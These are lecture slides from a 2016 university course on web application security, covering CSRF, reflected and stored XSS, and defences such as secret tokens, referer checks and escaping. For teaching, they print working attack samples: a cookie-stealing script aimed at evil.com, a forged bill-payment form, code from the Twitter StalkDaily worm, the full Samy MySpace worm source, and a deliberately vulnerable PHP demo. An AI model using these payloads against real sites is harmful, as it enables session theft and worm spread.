Web Security: Web Application Security · OWASP Top 10 Web Vulnerabilities 1. Injection 2. Broken...
Transcript of Web Security: Web Application Security · OWASP Top 10 Web Vulnerabilities 1. Injection 2. Broken...
CSE484/CSEM584:ComputerSecurityandPrivacy
WebSecurity:
WebApplicationSecurity
Spring2016
Franziska(Franzi)[email protected]
ThankstoDanBoneh,DieterGollmann,DanHalperin,YoshiKohno,JohnManferdelli,JohnMitchell,VitalyShmatikov,BennetYee,andmanyothersforsampleslidesandmaterials...
WebApplications
• Bigtrend:softwareasaWeb-basedservice– Onlinebanking,shopping,government,billpayment,tax
prep,customerrelationshipmanagement,etc.– Cloudcomputing
• ApplicationshostedonWebservers– WritteninamixtureofPHP,Ruby,Java,Perl,ASP
• Securityisrarelythemainconcern– Poorlywrittenscriptswithinadequateinputvalidation– Sensitivedatastoredinworld-readablefiles
5/3/16 CSE484/CSEM584-Spring2016 2
DynamicWebApplication
5/3/16 CSE484/CSEM584-Spring2016 3
Browser
Webserver
GET/HTTP/1.1
HTTP/1.1200OK
index.php
Databaseserver
OWASPTop10WebVulnerabilities
1. Injection2. BrokenAuthentication&SessionManagement3. Cross-SiteScripting4. InsecureDirectObjectReferences5. SecurityMisconfiguration6. SensitiveDataExposure7. MissingFunctionLevelAccessControl8. Cross-SiteRequestForgery9. UsingKnownVulnerableComponents10. UnvalidatedRedirectsandForwards
5/3/16 CSE484/CSEM584-Spring2016 4
http://www.owasp.org
Cross-SiteRequestForgery(CSRF/XSRF)
5/3/16 CSE484/CSEM584-Spring2016 5
Cookie-BasedAuthenticationRedux
5/3/16 CSE484/CSEM584-Spring2016 6
ServerBrowserPOST/login.cgi
Set-cookie:authenticator
GET…Cookie:authenticator
response
BrowserSandboxRedux
• Basedonthesameoriginpolicy(SOP)• Activecontent(scripts)cansendanywhere!
– Forexample,cansubmitaPOSTrequest– Someportsinaccessible--e.g.,SMTP(email)
• Canonlyreadresponsefromthesameorigin– …butyoucandoalotwithjustsending!
5/3/16 CSE484/CSEM584-Spring2016 7
Cross-SiteRequestForgery
• Userslogsintobank.com,forgetstosignoff– Sessioncookieremainsinbrowserstate
• Userthenvisitsamaliciouswebsitecontaining <form name=BillPayForm action=http://bank.com/BillPay.php> <input name=recipient value=badguy> …
<script> document.BillPayForm.submit(); </script>• Browsersendscookie,paymentrequestfulfilled!• Lesson:cookieauthenticationisnotsufficient
whensideeffectscanhappen
5/3/16 CSE484/CSEM584-Spring2016 8
CookiesinForgedRequests
5/3/16 CSE484/CSEM584-Spring2016 9
Usercredentialsautomaticallysentbybrowser
Cookie:SessionID=523FA4cd2E
SendingaCross-DomainPOST<form method="POST" action=http://othersite.com/action >...</form><script>document.forms[0].submit()</script>
• Hiddeniframecandothisinthebackground• Uservisitsamaliciouspage,browsersubmitsformonbehalfoftheuser– Hijackanyongoingsession(ifnoprotection)
• Netflix:changeaccountsettings,Gmail:stealcontacts,Amazon:one-clickpurchase
– Reprogramtheuser’shomerouter– Manyotherattackspossible
5/3/16 CSE484/CSEM584-Spring2016 10
submitpost
XSRF(akaCSRF):Summary
5/3/16 CSE484/CSEM584-Spring2016 11
Attackserver
Servervictim
Uservictim
establishsessio
n
sendforgedre
quest
visitserverreceivemaliciouspage
1
2
3
4
Q:howlongdoyoustayloggedontoGmail?Financialsites?
XSRFTrueStory
5/3/16 CSE484/CSEM584-Spring2016 12
[AlexStamos]
Internet Exploder
CyberVillians.com
StockBroker.com
ticker.stockbroker.comJava
GET news.html
HTML and JSwww.cybervillians.com/news.html
B er nank eR ea l l yan A l i en ?
scriptHTML Form POSTs
Hiddeniframessubmittedformsthat…• Changeduser’semailnotificationsettings• Linkedanewcheckingaccount• Transferredout$5,000• Unlinkedtheaccount• Restoredemailnotifications
BroaderViewofXSRF
• Abuseofcross-sitedataexport– SOPdoesnotcontroldataexport– Maliciouswebpagecaninitiatesrequestsfromtheuser’sbrowsertoanhonestserver
– Serverthinksrequestsarepartoftheestablishedsessionbetweenthebrowserandtheserver(automaticallysendscookies)
5/3/16 CSE484/CSEM584-Spring2016 13
LoginXSRF:Attackerlogsyouinasthem!
5/3/16 CSE484/CSEM584-Spring2016 14
Userloggedinasattacker
Attacker’saccountreflectsuser’sbehavior
XSRFDefenses
5/3/16 CSE484/CSEM584-Spring2016 15
• Secretvalidationtoken
• Referervalidation
<inputtype=hiddenvalue=23a3af01b>
Referer:http://www.facebook.com/home.php
AddSecretTokentoForms
• “SynchronizerTokenPattern”• Includeasecretchallengetokenasahiddeninput
informs– Tokenoftenbasedonuser’ssessionID– Servermustverifycorrectnessoftokenbefore
executingsensitiveoperations
• Whydoesthiswork?– Same-originpolicy:attackercan’treadtokenoutof
legitimateformsloadedinuser’sbrowser,socan’tcreatefakeformswithcorrecttoken
5/3/16 CSE484/CSEM584-Spring2016 16
<inputtype=hiddenvalue=23a3af01b>
RefererValidation
5/3/16 CSE484/CSEM584-Spring2016 17
• Lenientrefererchecking–headerisoptional• Strictrefererchecking–headerisrequired
Referer:http://www.facebook.com/home.php
Referer:http://www.evil.com/attack.html
Referer:
üû?
WhyNotAlwaysStrictChecking?
• Whymighttherefererheaderbesuppressed?– Strippedbytheorganization’snetworkfilter
• Forexample,http://intranet.corp.apple.com/projects/iphone/competitors.html
– Strippedbythelocalmachine– StrippedbythebrowserforHTTPS→HTTPtransitions– Userpreferenceinbrowser– Buggybrowser
• Webapplicationscan’taffordtoblocktheseusers• RefererrarelysuppressedoverHTTPS
– LoginstypicallyuseHTTPS–helpsagainstloginXSRF!
5/3/16 CSE484/CSEM584-Spring2016 18
Cross-SiteScripting(XSS)
5/3/16 CSE484/CSEM584-Spring2016 19
PHP:HypertextProcessor
• ServerscriptinglanguagewithC-likesyntax• CaninterminglestaticHTMLandcode <input value=<?php echo $myvalue; ?>>• Canembedvariablesindouble-quotestrings$user = “world”; echo “Hello $user!”;or $user = “world”; echo “Hello” . $user . “!”;
• Formdatainglobalarrays$_GET,$_POST,…
5/3/16 CSE484/CSEM584-Spring2016 20
Echoing/“Reflecting”UserInputClassicmistakeinserver-sideapplicationshttp://naive.com/search.php?term=“JustinBieber”search.phprespondswith<html> <title>Search results</title><body>You have searched for <?php echo $_GET[term] ?>… </body>OrGET/hello.cgi?name=Bobhello.cgirespondswith<html>Welcome, dear Bob</html>
5/3/16 CSE484/CSEM584-Spring2016 21
Echoing/“Reflecting”UserInput
5/3/16 CSE484/CSEM584-Spring2016 22
naive.com/hello.cgi?name=Bob!
Welcome,dearBob
naive.com/hello.cgi?name=<img src=‘http://upload.wikimedia.org/wikipedia/en/thumb/3/39/YoshiMarioParty9.png/210px-YoshiMarioParty9.png’>!
Welcome,dear
Cross-SiteScripting(XSS)
5/3/16 CSE484/CSEM584-Spring2016 23
victim’sbrowser
naive.comevil.com
Accesssomewebpage
<iframesrc=http://naive.com/hello.cgi?name=<script>win.open(“http://evil.com/steal.cgi?cookie=”+document.cookie)</script>>
Forcesvictim’sbrowsertocallhello.cgionnaive.comwiththisscriptas“name”
GET/hello.cgi?name=<script>win.open(“http://evil.com/steal.cgi?cookie=”+document.cookie)</script> hello.cgi
executed
<HTML>Hello,dear<script>win.open(“http://evil.com/steal.cgi?cookie=”+document.cookie)</script>Welcome!</HTML>
InterpretedasJavaScriptbyvictim’sbrowser;openswindowandcallssteal.cgionevil.com
GET/steal.cgi?cookie=
hello.cgi
XSS–QuickDemo<?phpsetcookie("SECRET_COOKIE", "12345");header("X-XSS-Protection: 0");?><html><body><br><br><form action="vulnerable.php" method="get">Name: <input type="text" name="name" size="80"><input type="submit" value="submit”></form><br><br><br><div id="greeting"><?php$name = $_GET["name"]; if($name) { echo "Welcome " . $_GET['name'];}?></div></body></html>
5/3/16 CSE484/CSEM584-Spring2016 24
NeedtoexplicitlydisableXSSprotection–newerbrowserstrytohelpwebdevelopersavoidthesevulnerabilities!
ReflectedXSS
• Useristrickedintovisitinganhonestwebsite– Phishingemail,linkinabannerad,commentinablog
• Buginwebsitecodecausesittoechototheuser’sbrowseranarbitraryattackscript– Theoriginofthisscriptisnowthewebsiteitself!
• Scriptcanmanipulatewebsitecontents(DOM)toshowbogusinformation,requestsensitivedata,controlformfieldsonthispageandlinkedpages,causeuser’sbrowsertoattackotherwebsites– Thisviolatesthe“spirit”ofthesameoriginpolicy
5/3/16 CSE484/CSEM584-Spring2016 25
BasicPatternforReflectedXSS
5/3/16 CSE484/CSEM584-Spring2016 26
Attackserver
ServervictimUservictim
visitwebsite
receivemalicious
page
clickonlinkechouserinput
1
2
3
sendvaluabled
ata
5
4
WhereMaliciousScriptsLurk
• User-createdcontent– Socialsites,blogs,forums,wikis
• Whenvisitorloadsthepage,websitedisplaysthecontentandvisitor’sbrowserexecutesthescript– Manysitestrytofilteroutscriptsfromusercontent,butthisisdifficult!
5/3/16 CSE484/CSEM584-Spring2016 27
StoredXSS
5/3/16 CSE484/CSEM584-Spring2016 28
Attackserver
Servervictim
Uservictim
Injectmaliciousscriptrequestcontent
receivemaliciousscript
1
23
stealvaluabled
ata
4
Storebadstuff
Usersviewordownloadcontent
TwitterWorm(2009)
• CansaveURL-encodeddataintoTwitterprofile• Datanotescapedwhenprofileisdisplayed• Result:StalkDailyXSSexploit
– Ifviewaninfectedprofile,scriptinfectsyourownprofile
var update = urlencode("Hey everyone, join www.StalkDaily.com. It's a site like Twitter but with pictures, videos, and so much more! "); var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
var ajaxConn = new XHConn(); ajaxConn.connect(“/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update"); ajaxConn1.connect(“/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update”)
5/3/16 CSE484/CSEM584-Spring2016 29
http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/
PreventingCross-SiteScripting
• Anyuserinputandclient-sidedatamustbepreprocessedbeforeitisusedinsideHTML
• Remove/encodeHTMLspecialcharacters– Useagoodescapinglibrary
• OWASPESAPI(EnterpriseSecurityAPI)• Microsoft’sAntiXSS
– InPHP,htmlspecialchars(string)willreplaceallspecialcharacterswiththeirHTMLcodes• ‘becomes'“becomes"&becomes&
– InASP.NET,Server.HtmlEncode(string)
5/3/16 CSE484/CSEM584-Spring2016 30
EvadingXSSFilters
• PreventinginjectionofscriptsintoHTMLishard!– Blocking“<”and“>”isnotenough– Eventhandlers,stylesheets,encodedinputs(%3C),etc.– phpBBallowedsimpleHTMLtagslike<b>
<bc=“>” onmouseover=“script”x=“<b”>Hello<b>• Bewareoffilterevasiontricks(XSSCheatSheet)
– Iffilterallowsquoting(of<script>,etc.),bewareofmalformedquoting:<IMG"""><SCRIPT>alert("XSS")</SCRIPT>">
– LongUTF-8encoding– Scriptsarenotonlyin<script>:<iframesrc=‘https://bank.com/login’onload=‘steal()’>
5/3/16 CSE484/CSEM584-Spring2016 31
MySpaceWorm(1)
• UserscanpostHTMLontheirMySpacepages• MySpacedoesnotallowscriptsinusers’HTML– No<script>,<body>,onclick,<ahref=javascript://>
• …butdoesallow<div>tagsforCSS.– <divstyle=“background:url(‘javascript:alert(1)’)”>
• ButMySpacewillstripout“javascript”– Use“java<NEWLINE>script”instead
• ButMySpacewillstripoutquotes– Convertfromdecimalinstead:alert('doublequote:'+String.fromCharCode(34))
5/3/16 CSE484/CSEM584-Spring2016 32
http://namb.la/popular/tech.html
MySpaceWorm(2)Resultingcode:
<div id=mycode style="BACKGROUND: url('java �script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>
http://namb.la/popular/tech.html
5/3/16 CSE484/CSEM584-Spring2016 33
MySpaceWorm(3)• “Therewereafewothercomplicationsandthingstogetaround.Thiswasnotbyanymeansastraightforwardprocess,andnoneofthiswasmeanttocauseanydamageorpissanyoneoff.Thiswasintheinterestof..interest.Itwasinterestingandfun!”
• Startedon“samy”MySpacepage• Everybodywhovisitsaninfectedpage,becomes
infectedandadds“samy”asafriendandhero• 5hourslater“samy”has1,005,831friends
– Wasadding1,000friendspersecondatitspeak
5/3/16 CSE484/CSEM584-Spring2016 34
http://namb.la/popular/tech.html